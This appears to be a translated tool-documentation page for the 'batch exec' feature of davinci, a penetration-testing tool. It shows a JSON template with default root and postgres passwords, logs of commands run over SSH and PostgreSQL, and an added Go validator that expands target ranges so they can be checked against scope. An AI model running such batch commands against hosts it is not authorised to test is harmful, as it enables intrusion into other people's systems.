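Added example, not code from the original post or from the davinci project: a Go program that loads a batch template into the struct shown above, validates it and expands the three host notations, so the complete target list can be checked against the authorised scope before the batch is run. The set of valid cmd_type values is taken from the comment above; reading "192.168.83.1-20" as a range over the last octet is an assumption, since the page shows the notation but does not define it. The embedded template is the one davinci batch export produces above.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/netip"
	"strconv"
	"strings"
)

// batchExec mirrors the struct shown on this page; the json tags are the template's.
type batchExec struct {
	CmdType string   `json:"cmd_type"`
	Hosts   []string `json:"hosts"`
	Port    int      `json:"port,omitempty"`
	User    string   `json:"user,omitempty"`
	Passwd  string   `json:"passwd,omitempty"`
	Cmds    []string `json:"cmds"`
}

// Component types the page lists for cmd_type.
var knownTypes = map[string]bool{"ssh": true, "mysql": true, "pgsql": true, "gaussdb": true, "clickhouse": true, "redis": true, "mongo": true}

// Blocks larger than 2^16 addresses are refused: a typo like /8 would silently become 16 million targets.
const maxHostBits = 16

// expandHosts turns one "hosts" entry into addresses: plain host, CIDR block, or
// "a.b.c.x-y" (assumed here to mean a range over the last octet).
func expandHosts(spec string) ([]string, error) {
	if strings.Contains(spec, "/") {
		p, err := netip.ParsePrefix(spec)
		if err != nil || !p.Addr().Is4() || p.Bits() < 32-maxHostBits {
			return nil, fmt.Errorf("%s: expected an IPv4 block of at most 2^%d addresses", spec, maxHostBits)
		}
		var out []string
		for a := p.Masked().Addr(); p.Contains(a); a = a.Next() {
			out = append(out, a.String())
		}
		return out, nil
	}
	if i := strings.LastIndex(spec, "-"); i > 0 {
		base := spec[:i]
		if a, err := netip.ParseAddr(base); err == nil && a.Is4() {
			dot := strings.LastIndex(base, ".")
			lo, _ := strconv.Atoi(base[dot+1:]) // numeric, since base parsed as IPv4
			hi, err := strconv.Atoi(spec[i+1:])
			if err != nil || lo > hi || hi > 255 {
				return nil, fmt.Errorf("%s: bad last-octet range", spec)
			}
			var out []string
			for n := lo; n <= hi; n++ {
				out = append(out, base[:dot+1]+strconv.Itoa(n))
			}
			return out, nil
		}
	}
	return []string{spec}, nil // hostname or single address
}

// LoadPlan parses a template and rejects entries the tool could not act on.
func LoadPlan(data []byte) ([]batchExec, error) {
	var plan []batchExec
	if err := json.Unmarshal(data, &plan); err != nil {
		return nil, err
	}
	for i, b := range plan {
		switch {
		case !knownTypes[b.CmdType]:
			return nil, fmt.Errorf("entry %d: unknown cmd_type %q", i, b.CmdType)
		case len(b.Hosts) == 0 || len(b.Cmds) == 0:
			return nil, fmt.Errorf("entry %d: hosts and cmds must not be empty", i)
		case b.Port < 0 || b.Port > 65535:
			return nil, fmt.Errorf("entry %d: port %d out of range", i, b.Port)
		}
	}
	return plan, nil
}

// Targets expands a plan into "type://host:port" strings for review against the authorised scope.
func Targets(plan []batchExec) ([]string, error) {
	var out []string
	for _, b := range plan {
		for _, spec := range b.Hosts {
			hosts, err := expandHosts(spec)
			if err != nil {
				return nil, err
			}
			for _, h := range hosts {
				out = append(out, fmt.Sprintf("%s://%s:%d", b.CmdType, h, b.Port))
			}
		}
	}
	return out, nil
}

// The template that davinci batch export writes, copied from this page.
const sampleTemplate = `[{"cmd_type": "ssh", "hosts": ["127.0.0.1", "192.168.83.1/24", "192.168.83.1-20"],
  "port": 22, "user": "root", "passwd": "123456", "cmds": ["ls -al /", "ifconfig"]},
 {"cmd_type": "redis", "hosts": ["127.0.0.1"], "port": 6379, "cmds": ["dbsize"]}]`
```

Run on the exported template, Targets yields 278 entries (1 + 256 + 20 SSH targets and one Redis target), which is exactly the kind of number worth seeing before pressing go: the /24 alone touches every address in the block, including ones the engagement may not cover.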

Batch execution

The following template runs commands against SSH on 192.168.83.129 and PostgreSQL on 192.168.83.129:

    [
      {
        "cmd_type": "ssh",
        "hosts": [
          "192.168.83.129"
        ],
        "port": 22,
        "user": "root",
        "passwd": "123456",
        "cmds": [
          "ls -al /",
          "ifconfig"
        ]
      },
      {
        "cmd_type": "pgsql",
        "hosts": [
          "192.168.83.129"
        ],
        "port": 5432,
        "user": "postgres",
        "passwd": "123456",
        "cmds": [
          "select version()",
          "select oid, datname from pg_catalog.pg_database"
        ]
      }
    ]

Once the template is ready, run the batch with the following command.

    ┌──(rootkali)-[~/tools]
    └─# ./davinci batch exec -f davinci_batch.json
    2024/09/07 15:18:12 [info] load batch config success: davinci_batch.json
    2024/09/07 15:18:12 [info] try batch execute in : 192.168.83.129
    2024/09/07 15:18:13 [info] execute: ls -al /
    total 2097272
    drwxr-xr-x 26 root root 4096 Sep 5 19:29 .
    drwxr-xr-x 26 root root 4096 Sep 5 19:29 ..
    drwxr-xr-x 2 root root 4096 May 13 07:45 bin
    drwxr-xr-x 3 root root 4096 May 13 07:40 boot
    drwxrwxr-x 2 root root 4096 May 12 23:25 cdrom
    drwxr-xr-x 3 root root 4096 Sep 5 19:29 data
    drwxr-xr-x 17 root root 4380 Aug 29 20:55 dev
    drwxr-xr-x 128 root root 12288 Aug 27 23:48 etc
    drwxr-xr-x 4 root root 4096 Aug 27 23:52 home
    2024/09/07 15:18:13 [info] execute: ifconfig
    docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
    inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
    inet6 fe80::42:3ff:fec6:8068 prefixlen 64 scopeid 0x20<link>
    ether 02:42:03:c6:80:68 txqueuelen 0 (Ethernet)
    RX packets 13021 bytes 1372419 (1.3 MB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 14188 bytes 66081327 (66.0 MB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
    ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
    inet 192.168.83.129 netmask 255.255.255.0 broadcast 192.168.83.255
    inet6 fe80::20c:29ff:fe7b:6220 prefixlen 64 scopeid 0x20<link>
    ether 00:0c:29:7b:62:20 txqueuelen 1000 (Ethernet)
    RX packets 2027131 bytes 2375833742 (2.3 GB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 228336 bytes 36514508 (36.5 MB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
    lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
    inet 127.0.0.1 netmask 255.0.0.0
    inet6 ::1 prefixlen 128 scopeid 0x10<host>
    loop txqueuelen 1000 (Local Loopback)
    RX packets 9906 bytes 745185 (745.1 KB)
    RX errors 0 dropped 0 overruns 0 frame 0
    TX packets 9906 bytes 745185 (745.1 KB)
    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
    2024/09/07 15:18:13 [info] try batch execute in : 192.168.83.129
    2024/09/07 15:18:13 [info] execute sql: select version()
    +--------------------------------+
    | VERSION |
    +--------------------------------+
    | PostgreSQL 16.4 (Debian |
    | 16.4-1.pgdg120+1) on |
    | x86_64-pc-linux-gnu, compiled |
    | by gcc (Debian 12.2.0-14) |
    | 12.2.0, 64-bit |
    +--------------------------------+
    2024/09/07 15:18:13 [info] execute sql: select oid, datname from pg_catalog.pg_database
    +-----+-----------+
    | OID | DATNAME |
    +-----+-----------+
    | 5 | postgres |
    | 1 | template1 |
    | 4 | template0 |
    +-----+-----------+

If no template file is given with -f, the .davinci_batch.json file in the current directory is used as the template by default.

Instead of a template file, you can also pass the template content directly with -b/--b64config; just base64-encode the template:

    ./davinci batch exec -b <base64-encoded template>

This tool is intended only for research and lawful testing; using it to attack targets without authorization is illegal. Do not use it in production environments.

Users must understand the risks the different techniques introduce (for example, Redis master-slave replication wipes the data); any consequences or losses caused by using the tool are the user's own responsibility.

For more usage, see: https://github.com/Ape1ron/davinci/wiki


Source: https://mp.weixin.qq.com/s?__biz=Mzg2MDY2ODc5MA==&mid=2247484010&idx=1&sn=6face0aa268ccb988c6072b3a6d5a0ee&chksm=ce239473f9541d6575b912185cebe20f21c6e449edf320623affa0f53f2a317949fc6ac7f19b&scene=58&subscene=0#rd